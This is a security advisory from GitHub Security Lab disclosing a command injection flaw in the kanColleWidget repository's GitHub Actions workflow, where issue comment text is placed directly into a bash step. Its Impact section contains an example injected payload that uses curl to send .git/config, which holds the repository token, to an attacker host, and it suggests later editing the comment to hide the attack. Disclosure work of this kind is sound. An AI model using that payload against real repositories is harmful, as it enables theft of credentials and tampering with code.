February 3, 2021

GHSL-2020-191: Command injection in KanCraft/kanColleWidget workflow

Jaroslav Lobačevski

Coordinated Disclosure Timeline

  • 10/16/2020: Report sent to vendor
  • 10/18/2020: Issue fixed

Summary

The 'contrib-notice.yml' GitHub workflow is vulnerable to arbitrary command injection.

Product

KanCraft/kanColleWidget GitHub repository

Tested Version

contrib-notice.yml from the develop branch.

Details

Issue: The public GitHub issue comment is used to format a shell command

When a user comments on a public issue it automatically starts the contrib-notice.yml GitHub workflow. The comment text is used to format a bash script.

on:
  issues:
    types: [opened, reopened]
  issue_comment:
    types: [created]
  gollum:
...
jobs:
  notification:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
...
    - name: Issueコメント用ツイート内容の生成
      if: github.event_name == 'issue_comment' && github.event.action == 'created' && github.event.sender.login != 'coveralls'
      env:
        SENDER: ${{ github.event.sender.login }}
        BODY: ${{ github.event.comment.body }}
        URL: ${{ github.event.comment.html_url }}
      run: |
        echo "[DEBUG] ORIG: ${{ github.event.comment.body }}"
        echo "[DEBUG] BODY: ${BODY}"
        if [ ${#BODY} -gt 80 ]; then TEXT="$(echo ${BODY} | cut -c1-80)…"; else TEXT=${BODY}; fi;
        echo "[DEBUG] TEXT: ${TEXT}"
        echo -ne "${SENDER}さんがコメントしました!\n> ${TEXT}\n${URL}" >> announcement.txt
...

Impact

This vulnerability allows for arbitrary command injection into the bash script. For example a user may comment with `set +e; curl -d @.git/config http://evil.com; sleep 10` which will exfiltrate the temporary GitHub repository authorization token to the attacker controlled server. Although the token is not valid after the workflow finishes, since the attacker controls the execution of the workflow he or she can delay it to give the malicious server time to modify the repository. To make the attack less visible the attacker may modify the comment later.

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-191 in any communication regarding this issue.